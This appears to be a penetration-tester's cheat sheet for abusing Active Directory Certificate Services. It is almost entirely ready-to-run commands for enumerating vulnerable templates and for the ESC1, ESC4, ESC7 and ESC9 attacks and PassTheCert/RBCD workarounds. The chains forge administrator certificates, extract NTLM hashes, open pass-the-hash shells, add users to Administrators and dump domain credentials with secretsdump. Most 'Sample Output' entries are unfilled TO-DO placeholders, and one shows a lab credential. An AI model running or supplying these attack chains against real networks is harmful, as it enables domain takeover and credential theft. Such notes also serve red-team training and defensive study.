Usage Tips:
- Click on a keyword to enable inline editing.
- Click inside a code block to copy (excludes comments).
- Use the button to view examples.
- Click outside to collapse all examples.
Enum (From Linux)
# Password
certipy-ad find -u '<USER>' -p '<PASSWORD>' -target <TARGET> -text -stdout -vulnerable
Sample Output:
TO-DO# NTLM
certipy-ad find -u '<USER>' -hashes '<HASH>' -target <TARGET> -text -stdout -vulnerable
Sample Output:
TO-DO# Password
nxc ldap <TARGET> -u '<USER>' -p '<PASSWORD>' -M adcs
Sample Output:
TO-DO# NTLM
nxc ldap <TARGET> -u '<USER>' -H '<HASH>' -M adcs
Sample Output:
TO-DOEnum (From Windows)
# Check ADCS service
net start | findstr /i cert
Sample Output:
TO-DO# Check env
certutil
Sample Output:
TO-DO# List cert templates
certutil -catemplates
Sample Output:
TO-DO# Get info of each template
.\certify.exe find
Sample Output:
TO-DO# Find vuln templates
.\certify.exe find /vulnerable /currentuser
Sample Output:
TO-DO# Import ADCSTemplate module
import-module .\ADCSTemplate.psm1
Sample Output:
TO-DO# List templates
get-adcstemplate | fl displayname
Sample Output:
TO-DORef: ADCSTemplate
Request a Personal Information Exchange File (.pfx)
1. Request a pfx
certipy-ad req -u '<USER>@<DOMAIN>' -p '<PASSWORD>' -ca <CA> -template User -target <DC> -pfx '<USER>.pfx'
Sample Output:
$ certipy-ad req -u 'oorend@rebound.htb' -p '1GR8t@$$4u' -ca rebound-DC01-CA -template User -target dc01.rebound.htb -pfx oorend.pfx
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 7
[*] Got certificate with UPN 'oorend@rebound.htb'
[*] Certificate object SID is 'S-1-5-21-4078382237-1492182817-2568127209-7682'
[*] Saved certificate and private key to 'oorend.pfx'
2. Get NTLM Hash with pfx
sudo ntpdate -s <DC> && certipy-ad auth -pfx '<USER>.pfx'
Sample Output:
TO-DO1. Request a Certificate
.\certify.exe request /ca:<CA> /template:User
Sample Output:
TO-DO2. Convert pem to pfx
# Copy -----BEGIN RSA PRIVATE KEY----- ...[SNIP]... -----END CERTIFICATE----- to cert.pem
openssl pkcs12 -in cert.pem -keyex -CSP 'Microsoft Enhanced Cryptographic Provider v1.0' -export -out cert.pfx
Sample Output:
TO-DO3. Get NTLM Hash with pfx
.\rubeus.exe asktgt /user:'<USER>' /certificate:cert.pfx /getcredentials /show /nowrap
Sample Output:
TO-DOESC1
+----------------------------------------------------------+
| Enabled : True |
| Client Authentication : True |
| Enrollee Supplies Subject : True |
| Certificate Name Flag : EnrolleeSuppliesSubject |
| Requires Management Approval : False |
| Authorized Signatures Required : 0 |
+----------------------------------------------------------+
Sample Output:
TO-DOAbuse #1: Add Smartcard Logon
1. Import Modules
. .\PowerView.ps1
Sample Output:
TO-DO. .\ADCS.ps1
Sample Output:
TO-DO2. Add Smartcart Logon
Get-SmartCardCertificate -Identity Administrator -TemplateName <VULN_TEMPLATE> -NoSmartCard -Verbose
Sample Output:
TO-DO3. Get Cert_Thumbprint
Get-ChildItem cert:\currentuser\my -recurse
Sample Output:
TO-DO4. Get NTLM hash
.\rubeus.exe asktgt /user:Administrator /certificate:<THUMBPRINT> /getcredentials /show /nowrap
Sample Output:
TO-DO5. Remote
impacket-psexec -hashes :<HASH> administrator@<DOMAIN> cmd.exe
Sample Output:
TO-DORef: PoshADCS
Abuse #2: Set Alternative Name
1. Generate a Cert with Altname
certipy-ad req -u '<USER>' -p '<PASSWORD>' -target <TARGET> -upn administrator@<DOMAIN> -ca <CA> -template <VULN_TEMPLATE>
Sample Output:
TO-DO2. Get NTLM Hash
sudo ntpdate -s <DC> && certipy-ad auth -pfx administrator.pfx
Sample Output:
TO-DO3. Remote
evil-winrm -i <TARGET> -u administrator -H <HASH>
Sample Output:
TO-DO1. Generate a Cert with Altname
.\certify.exe request /ca:<CA> /template:<VULN_TEMPLATE> /altname:administrator
Sample Output:
TO-DO2. Convert pem to pfx
# Copy -----BEGIN RSA PRIVATE KEY----- ...[SNIP]... -----END CERTIFICATE----- to cert.pem
openssl pkcs12 -in cert.pem -keyex -CSP 'Microsoft Enhanced Cryptographic Provider v1.0' -export -out administrator.pfx
Sample Output:
TO-DO3. Get NTLM Hash
.\rubeus.exe asktgt /user:Administrator /certificate:administrator.pfx /getcredentials /show /nowrap
Sample Output:
TO-DO4. Remote
# Remote
impacket-psexec -hashes :<HASH> administrator@<DOMAIN> cmd.exe
Sample Output:
TO-DOAbuse #3: Set msPKI-Certificate-Name-Flag
1. Import ADCSTemplate Module
import-module .\ADCSTemplate.psm1
Sample Output:
TO-DO2. Create Template with msPKI-Certificate-Name-Flag Modified
Export-ADCSTemplate -displayName <VULN_TEMPLATE> > template.json
Sample Output:
TO-DO$template = cat template.json -raw | ConvertFrom-Json
Sample Output:
TO-DO$template.'msPKI-Certificate-Name-Flag' = 0x1
Sample Output:
TO-DO$template | ConvertTo-Json | Set-Content template_mod.json
Sample Output:
TO-DO3. Create a New Certificate Template
New-ADCSTemplate -DisplayName 'vuln_esc1' -Publish -JSON (cat template_mod.json -raw)
Sample Output:
TO-DO4. Allow the User to Enroll in the Certificate
# Set permissions on the new template to allow a specific user to enroll in the certificate
Set-ADCSTemplateACL -DisplayName 'vuln_esc1' -type allow -identity '<DOMAIN>\<USER>' -enroll
Sample Output:
TO-DO5. Request a Cert with Altname
.\certify.exe request /ca:<CA> /template:vuln_esc1 /altname:administrator
Sample Output:
TO-DO6. Get NTLM Hash
.\rubeus.exe asktgt /user:Administrator /certificate:administrator.pfx /getcredentials /show /nowrap
Sample Output:
TO-DO7. Remote
impacket-psexec -hashes :<HASH> administrator@<DOMAIN> cmd.exe
Sample Output:
TO-DORef: ADCSTemplate
ESC4
1. Update Template
certipy-ad template -username '<USER>' -hashes '<HASH>' -template '<TEMPLATE>' -target <TARGET> -save-old
Sample Output:
TO-DO2. Request a Cert Based on the ESC4 Template
certipy-ad req -username '<USER>' -hashes '<HASH>' -template '<TEMPLATE>' -target <TARGET> -ca <CA> -upn administrator@<DOMAIN>
Sample Output:
TO-DO3. Get NTLM Hash
certipy-ad auth -pfx administrator.pfx -dc-ip <DC_IP>
Sample Output:
TO-DO4. Remote
evil-winrm -i <TARGET> -u administrator -H <HASH>
Sample Output:
TO-DOESC7
+---------------------+
| Access Right |
|=====================|
| Manage CA |
| Manage Certificates |
+---------------------+
Sample Output:
TO-DO
1. Use ManageCA Privilege to Add Manage Certificates Permission
certipy-ad ca -ca <CA> -add-officer '<USER>' -u '<USER>@<DOMAIN>' -p '<PASSWORD>'
Sample Output:
TO-DO# Check
certipy-ad find -dc-ip <DC> -ns <DC_IP> -u '<USER>@<DOMAIN>' -p '<PASSWORD>' -vulnerable -stdout
Sample Output:
TO-DO2. Request a Cert Based on SubCA
# Take note of the Request ID
certipy-ad req -ca <CA> -target <TARGET_DOMAIN> -template SubCA -upn administrator@<DOMAIN> -u '<USER>@<DOMAIN>' -p '<PASSWORD>'
Sample Output:
TO-DO3. Issue Request Using ManageCA and Manage Certificates Privilege
certipy-ad ca -ca <CA> -issue-request <REQUEST_ID> -u '<USER>@<DOMAIN>' -p '<PASSWORD>'
Sample Output:
TO-DO4. Request a Certificate from CA on the Target Domain
certipy-ad req -ca <CA> -target <TARGET_DOMAIN> -retrieve <REQUEST_ID> -u '<USER>@<DOMAIN>' -p '<PASSWORD>'
Sample Output:
TO-DO5. Get NTLM Hash
certipy-ad auth -pfx administrator.pfx -dc-ip <DC>
Sample Output:
TO-DO6. Remote
evil-winrm -i <TARGET> -u administrator -H <HASH>
Sample Output:
TO-DOESC9
1. Modify Target User’s userPrincipalName (With GenericAll/GenericWrite)
# Password
certipy-ad account update -username '<USER>@<DOMAIN>' -password '<PASSWORD>' -user <TARGET_USER> -upn Administrator
Sample Output:
TO-DO# NTLM
certipy-ad account update -username '<USER>@<DOMAIN>' -hashes <HASH> -user <TARGET_USER> -upn Administrator
Sample Output:
TO-DO2. Request a Cert of Targer User
# Password
certipy-ad req -username '<TARGET_USER>@<DOMAIN>' -password '<PASSWORD>' -ca <CA> -template <VULN_TEMPLATE>
Sample Output:
TO-DO# NTLM
certipy-ad req -username '<TARGET_USER>@<DOMAIN>' -hashes <HASH> -ca <CA> -template <VULN_TEMPLATE>
Sample Output:
TO-DO3. Change Back Target User’s userPrincipalName
# Password
certipy-ad account update -username '<USER>@<DOMAIN>' -password '<PASSWORD>' -user <TARGET_USER> -upn '<TARGET_USER>@<DOMAIN>'
Sample Output:
TO-DO# NTLM
certipy-ad account update -username '<USER>@<DOMAIN>' -hashes <HASH> -user <TARGET_USER> -upn '<TARGET_USER>@<DOMAIN>'
Sample Output:
TO-DO4. Get NTLM Hash
certipy-ad auth -pfx administrator.pfx -domain certified.htb
Sample Output:
TO-DO5. Remote
evil-winrm -i <TARGET> -u administrator -H <HASH>
Sample Output:
TO-DOWorkaround: Kerberos SessionError: KDC_ERR_PADATA_TYPE_NOSUPP
1. Create Key and Cert from pfx
certipy-ad cert -pfx '<USER>.pfx' -nocert -out '<USER>.key'
Sample Output:
TO-DOcertipy-ad cert -pfx '<USER>.pfx' -nokey -out '<USER>.crt'
Sample Output:
TO-DO
1. Get a LDAP Shell
python3 PassTheCert/Python/passthecert.py -action ldap-shell -crt '<USER>.crt' -key '<USER>.key' -domain <DOMAIN> -dc-ip <DC>
Sample Output:
TO-DO2. Add User to Administrators Group
add_user_to_group '<USER>' administrators
Sample Output:
TO-DO3. Remote
evil-winrm -i <TARGET_DOMAIN> -u '<USER>' -p '<PASSWORD>'
Sample Output:
TO-DORef: PassTheCert
1. RBCD Attack
python3 PassTheCert/Python/passthecert.py -action write_rbcd -delegate-to '<TARGET_COMPUTER>$' -delegate-from 'Evil_Computer$' -crt administrator.crt -key administrator.key -domain <DOMAIN> -dc-ip <DC>
Sample Output:
TO-DO2. Request a Service Ticket
sudo ntpdate -s <DC> && python3 impacket-getST -spn 'cifs/<TARGET_DOMAIN>' -impersonate Administrator '<DOMAIN>/Evil_Computer$:<GENERATED_PASSWORD>'
Sample Output:
TO-DO3. Secrets Dump
export KRB5CCNAME=Administrator.ccache
Sample Output:
TO-DOimpacket-secretsdump '<DOMAIN>/administrator@<TARGET_DOMAIN>' -k -no-pass -just-dc-ntlm
Sample Output:
TO-DO5. Remote
evil-winrm -i <TARGET_DOMAIN> -u administrator -H <HASH>
Sample Output:
TO-DORef: PassTheCert